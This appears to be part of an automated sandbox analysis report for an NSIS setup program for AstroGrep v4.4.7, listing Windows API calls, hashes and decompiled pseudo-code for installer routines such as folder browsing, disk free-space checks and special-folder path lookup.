                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                            • GetWindowLongA.USER32 ref: 00404AF5
                                                                                                            • SetWindowLongA.USER32 ref: 00404B03
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                                                            • GlobalFree.KERNEL32 ref: 00404CF4
                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                            • GetDlgItem.USER32 ref: 00404E9E
                                                                                                            • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                            • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                            • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                            • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404352, Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 274stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00404352(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				union _ULARGE_INTEGER _v28;
				intOrPtr _v32;
				long _v36;
				union _ULARGE_INTEGER _v40;
				unsigned int _v44;
				union _ULARGE_INTEGER _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				struct %anon54 _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				long _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x429040; // 0x6eafd4
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405509(0x3fb, _t146);
					E00405F9A(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405509(0x3fb, _t146);
							if(E0040588F(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405D2F(0x428838, _t146);
							_t87 = E004060C8(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405D2F(0x428838, _t146);
								_t89 = E0040583A(0x428838);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428838,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48.LowPart = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x428838) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = GetDiskFreeSpaceExA(0x428838,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E004057E8(0x428838);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x428838) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48.LowPart = (_t150 << 0x00000020 | _v48.LowPart) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E004047E6(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48.LowPart < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42dbdc; // 0x6fdecd
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E004047CE(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x428828);
									} else {
										E00404709(_t168, 0xfffffffc, _v48.LowPart, _v44); // executed
									}
								}
								_t96 = _v8;
								 *0x42e4a4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403F36(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x429858 - _t158; // 0x0
									if(_t205 == 0) {
										E004042E7();
									}
								}
								 *0x429858 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x429868;
							_v60 = E004046A3;
							_v56 = _t146;
							_v68 = E00405D51(_t146, 0x429868, _t166, 0x428c40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057A1(_t146);
								_t125 =  *((intOrPtr*)( *0x42e410 + 0x11c));
								if( *((intOrPtr*)( *0x42e410 + 0x11c)) != 0 && _t146 == "C:\\Program Files (x86)\\AstroGrep") {
									E00405D51(_t146, 0x429868, _t166, 0, _t125);
									if(lstrcmpiA(0x42d3a0, 0x429868) != 0) {
										lstrcatA(_t146, 0x42d3a0);
									}
								}
								 *0x429858 =  *0x429858 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040580E(_t146) != 0 && E0040583A(_t146) == 0) {
						E004057A1(_t146);
					}
					 *0x42dbd8 = _t166; // executed
					SetWindowTextA(_t165, _t146); // executed
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F14(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F14(_t166);
					E00403F49(_t165);
					if(E004060C8(6) == 0) {
						L53:
						return E00403F7B(_a8, _a12, _a16);
					} else {
						SHAutoComplete(_t165, 1); // executed
						goto L8;
					}
				}
			}














































                                                                                                            0x00404352
                                                                                                            0x00404358
                                                                                                            0x0040435e
                                                                                                            0x0040436b
                                                                                                            0x00404379
                                                                                                            0x0040437c
                                                                                                            0x00404384
                                                                                                            0x0040438a
                                                                                                            0x0040438a
                                                                                                            0x00404396
                                                                                                            0x00404399
                                                                                                            0x00404407
                                                                                                            0x0040440e
                                                                                                            0x004044e5
                                                                                                            0x004044ec
                                                                                                            0x004044fb
                                                                                                            0x004044fb
                                                                                                            0x004044ff
                                                                                                            0x00404509
                                                                                                            0x00404516
                                                                                                            0x00404518
                                                                                                            0x00404518
                                                                                                            0x00404526
                                                                                                            0x0040452d
                                                                                                            0x00404534
                                                                                                            0x00404537
                                                                                                            0x0040456e
                                                                                                            0x00404570
                                                                                                            0x00404576
                                                                                                            0x0040457b
                                                                                                            0x0040457f
                                                                                                            0x00404581
                                                                                                            0x00404581
                                                                                                            0x0040459d
                                                                                                            0x00000000
                                                                                                            0x0040459f
                                                                                                            0x004045a2
                                                                                                            0x004045b0
                                                                                                            0x004045b6
                                                                                                            0x004045b7
                                                                                                            0x004045ba
                                                                                                            0x004045bd
                                                                                                            0x00000000
                                                                                                            0x004045bd
                                                                                                            0x00404539
                                                                                                            0x0040453b
                                                                                                            0x0040453f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404541
                                                                                                            0x00404541
                                                                                                            0x0040454e
                                                                                                            0x00404553
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404557
                                                                                                            0x00404559
                                                                                                            0x00404559
                                                                                                            0x00404561
                                                                                                            0x00404563
                                                                                                            0x00404566
                                                                                                            0x00404569
                                                                                                            0x0040456c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040456c
                                                                                                            0x004045c9
                                                                                                            0x004045d3
                                                                                                            0x004045d6
                                                                                                            0x004045d9
                                                                                                            0x004045e0
                                                                                                            0x004045e0
                                                                                                            0x004045e2
                                                                                                            0x004045e2
                                                                                                            0x004045e7
                                                                                                            0x004045e9
                                                                                                            0x004045f1
                                                                                                            0x004045f8
                                                                                                            0x004045fa
                                                                                                            0x00404605
                                                                                                            0x00404605
                                                                                                            0x004045fa
                                                                                                            0x0040460c
                                                                                                            0x00404615
                                                                                                            0x0040461f
                                                                                                            0x00404627
                                                                                                            0x00404642
                                                                                                            0x00404629
                                                                                                            0x00404632
                                                                                                            0x00404632
                                                                                                            0x00404627
                                                                                                            0x00404647
                                                                                                            0x0040464c
                                                                                                            0x00404651
                                                                                                            0x0040465a
                                                                                                            0x0040465a
                                                                                                            0x00404663
                                                                                                            0x00404665
                                                                                                            0x00404665
                                                                                                            0x00404671
                                                                                                            0x00404679
                                                                                                            0x0040467b
                                                                                                            0x00404681
                                                                                                            0x00404683
                                                                                                            0x00404683
                                                                                                            0x00404681
                                                                                                            0x00404688
                                                                                                            0x00000000
                                                                                                            0x00404688
                                                                                                            0x00404537
                                                                                                            0x004044ee
                                                                                                            0x004044f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004044f5
                                                                                                            0x00404414
                                                                                                            0x0040441d
                                                                                                            0x00404437
                                                                                                            0x0040443c
                                                                                                            0x00404446
                                                                                                            0x0040444d
                                                                                                            0x00404459
                                                                                                            0x0040445c
                                                                                                            0x0040445f
                                                                                                            0x00404466
                                                                                                            0x0040446e
                                                                                                            0x00404471
                                                                                                            0x00404475
                                                                                                            0x0040447c
                                                                                                            0x00404484
                                                                                                            0x004044de
                                                                                                            0x00404486
                                                                                                            0x00404487
                                                                                                            0x0040448e
                                                                                                            0x00404498
                                                                                                            0x004044a0
                                                                                                            0x004044ad
                                                                                                            0x004044c1
                                                                                                            0x004044c5
                                                                                                            0x004044c5
                                                                                                            0x004044c1
                                                                                                            0x004044ca
                                                                                                            0x004044d7
                                                                                                            0x004044d7
                                                                                                            0x00404484
                                                                                                            0x00000000
                                                                                                            0x0040443c
                                                                                                            0x0040442a
                                                                                                            0x00000000
                                                                                                            0x00404430
                                                                                                            0x00404430
                                                                                                            0x00000000
                                                                                                            0x00404430
                                                                                                            0x0040439b
                                                                                                            0x004043a8
                                                                                                            0x004043b1
                                                                                                            0x004043be
                                                                                                            0x004043be
                                                                                                            0x004043c5
                                                                                                            0x004043cb
                                                                                                            0x004043d4
                                                                                                            0x004043d7
                                                                                                            0x004043da
                                                                                                            0x004043e2
                                                                                                            0x004043e5
                                                                                                            0x004043e8
                                                                                                            0x004043ee
                                                                                                            0x004043fc
                                                                                                            0x0040468e
                                                                                                            0x004046a0
                                                                                                            0x00404402
                                                                                                            0x00404405
                                                                                                            0x00000000
                                                                                                            0x00404405
                                                                                                            0x004043fc

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004043A1
                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000006,00000000,?,00000014,?,?,00000001,?), ref: 00404405
                                                                                                            • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                            • lstrcmpiA.KERNEL32(Remove folder: ,AstroGrep v4.4.7 Setup ,00000000,?,?), ref: 004044B9
                                                                                                            • lstrcatA.KERNEL32(?,Remove folder: ), ref: 004044C5
                                                                                                            • SetDlgItemTextA.USER32 ref: 004044D7
                                                                                                              • Part of subcall function 00405509: GetDlgItemTextA.USER32 ref: 0040551C
                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                              • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                            • GetDiskFreeSpaceExA.KERNELBASE(C:\Program Files (x86)\,?,?,?,00000001,C:\Program Files (x86)\,?,?,000003FB,?), ref: 0040454E
                                                                                                            • GetDiskFreeSpaceA.KERNEL32(C:\Program Files (x86)\,?,?,0000040F,?,C:\Program Files (x86)\,C:\Program Files (x86)\,?,00000001,C:\Program Files (x86)\,?,?,000003FB,?), ref: 00404595
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                              • Part of subcall function 00404709: lstrlenA.KERNEL32(AstroGrep v4.4.7 Setup ,AstroGrep v4.4.7 Setup ,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                              • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                              • Part of subcall function 00404709: SetDlgItemTextA.USER32 ref: 004047C2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A$AstroGrep v4.4.7 Setup $C:\Program Files (x86)\$C:\Program Files (x86)\AstroGrep$Remove folder:
                                                                                                            • API String ID: 4039761011-522898372
                                                                                                            • Opcode ID: 51479397fbbd838061552f249f671c3551ae327016cead83452ae8504ab1da61
                                                                                                            • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                            • Opcode Fuzzy Hash: 51479397fbbd838061552f249f671c3551ae327016cead83452ae8504ab1da61
                                                                                                            • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405D51, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E00405D51(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x42dbdc; // 0x6fdecd
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_push(_t64);
				_t75 =  *0x42e438 + _t37;
				_t38 = 0x42d3a0;
				_push(_t89);
				_push(_t86);
				_t87 = 0x42d3a0;
				if(_a4 >= 0x42d3a0 && _a4 - 0x42d3a0 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405D51(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x42d3a0;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = (_t96 << 0xa) + 0x42f000;
							E00405D2F(_t87, (_t96 << 0xa) + 0x42f000);
						} else {
							E00405C8D(_t87,  *0x42e408);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405F9A(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42e484;
						if( *0x42e484 != 0) {
							_t98 = 4;
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x42e404;
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x42e408,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x42e408,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x42e438;
							E00405C16(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x42e438, _t87, _t70 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405D51(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405D2F(_a4, _t38);
			}





























                                                                                                            0x00405d51
                                                                                                            0x00405d51
                                                                                                            0x00405d51
                                                                                                            0x00405d57
                                                                                                            0x00405d5c
                                                                                                            0x00405d5e
                                                                                                            0x00405d6d
                                                                                                            0x00405d6d
                                                                                                            0x00405d75
                                                                                                            0x00405d76
                                                                                                            0x00405d78
                                                                                                            0x00405d80
                                                                                                            0x00405d81
                                                                                                            0x00405d82
                                                                                                            0x00405d84
                                                                                                            0x00405d9b
                                                                                                            0x00405d9e
                                                                                                            0x00405d9e
                                                                                                            0x00405f77
                                                                                                            0x00405f77
                                                                                                            0x00405f7b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405dab
                                                                                                            0x00405db1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405db7
                                                                                                            0x00405db8
                                                                                                            0x00405dbb
                                                                                                            0x00405dbe
                                                                                                            0x00405f6a
                                                                                                            0x00405f74
                                                                                                            0x00405f76
                                                                                                            0x00405f76
                                                                                                            0x00405f6c
                                                                                                            0x00405f6e
                                                                                                            0x00405f70
                                                                                                            0x00405f71
                                                                                                            0x00405f71
                                                                                                            0x00000000
                                                                                                            0x00405f6a
                                                                                                            0x00405dc4
                                                                                                            0x00405dc8
                                                                                                            0x00405dd8
                                                                                                            0x00405ddc
                                                                                                            0x00405de3
                                                                                                            0x00405de6
                                                                                                            0x00405dea
                                                                                                            0x00405df0
                                                                                                            0x00405df3
                                                                                                            0x00405df6
                                                                                                            0x00405df9
                                                                                                            0x00405f14
                                                                                                            0x00405f17
                                                                                                            0x00405f47
                                                                                                            0x00405f4a
                                                                                                            0x00405f4f
                                                                                                            0x00405f53
                                                                                                            0x00405f53
                                                                                                            0x00405f58
                                                                                                            0x00405f59
                                                                                                            0x00405f5e
                                                                                                            0x00405f61
                                                                                                            0x00405f63
                                                                                                            0x00000000
                                                                                                            0x00405f63
                                                                                                            0x00405f19
                                                                                                            0x00405f1c
                                                                                                            0x00405f31
                                                                                                            0x00405f38
                                                                                                            0x00405f1e
                                                                                                            0x00405f25
                                                                                                            0x00405f25
                                                                                                            0x00405f40
                                                                                                            0x00405f43
                                                                                                            0x00405f0c
                                                                                                            0x00405f0d
                                                                                                            0x00405f0d
                                                                                                            0x00000000
                                                                                                            0x00405f43
                                                                                                            0x00405e01
                                                                                                            0x00405e02
                                                                                                            0x00405e08
                                                                                                            0x00405e0a
                                                                                                            0x00405e24
                                                                                                            0x00405e24
                                                                                                            0x00405e2b
                                                                                                            0x00405e2b
                                                                                                            0x00405e32
                                                                                                            0x00405e36
                                                                                                            0x00405e36
                                                                                                            0x00405e37
                                                                                                            0x00405e39
                                                                                                            0x00405e72
                                                                                                            0x00405e75
                                                                                                            0x00405e85
                                                                                                            0x00405e88
                                                                                                            0x00405e90
                                                                                                            0x00405e96
                                                                                                            0x00405e96
                                                                                                            0x00405ef2
                                                                                                            0x00405ef2
                                                                                                            0x00405ef4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e9a
                                                                                                            0x00405ea1
                                                                                                            0x00405ea2
                                                                                                            0x00405ea4
                                                                                                            0x00405ebe
                                                                                                            0x00405ecc
                                                                                                            0x00405ed2
                                                                                                            0x00405ed4
                                                                                                            0x00405eef
                                                                                                            0x00405eef
                                                                                                            0x00405eef
                                                                                                            0x00000000
                                                                                                            0x00405eef
                                                                                                            0x00405eda
                                                                                                            0x00405ee5
                                                                                                            0x00405eeb
                                                                                                            0x00405eed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405eed
                                                                                                            0x00405ea6
                                                                                                            0x00405ea9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405eb8
                                                                                                            0x00405eba
                                                                                                            0x00405ebc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ebc
                                                                                                            0x00000000
                                                                                                            0x00405ef2
                                                                                                            0x00405e7d
                                                                                                            0x00000000
                                                                                                            0x00405e3b
                                                                                                            0x00405e40
                                                                                                            0x00405e56
                                                                                                            0x00405e5b
                                                                                                            0x00405e5e
                                                                                                            0x00405efb
                                                                                                            0x00405efb
                                                                                                            0x00405eff
                                                                                                            0x00405f07
                                                                                                            0x00405f07
                                                                                                            0x00000000
                                                                                                            0x00405eff
                                                                                                            0x00405e68
                                                                                                            0x00405ef6
                                                                                                            0x00405ef6
                                                                                                            0x00405ef9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ef9
                                                                                                            0x00405e39
                                                                                                            0x00405e0c
                                                                                                            0x00405e10
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e12
                                                                                                            0x00405e16
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e18
                                                                                                            0x00405e1c
                                                                                                            0x00000000
                                                                                                            0x00405e1e
                                                                                                            0x00405e1e
                                                                                                            0x00000000
                                                                                                            0x00405e1e
                                                                                                            0x00405e1c
                                                                                                            0x00405f81
                                                                                                            0x00405f8b
                                                                                                            0x00405f97
                                                                                                            0x00405f97
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(?,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,00404F80,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000), ref: 00405E02
                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00405E7D
                                                                                                            • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405E90
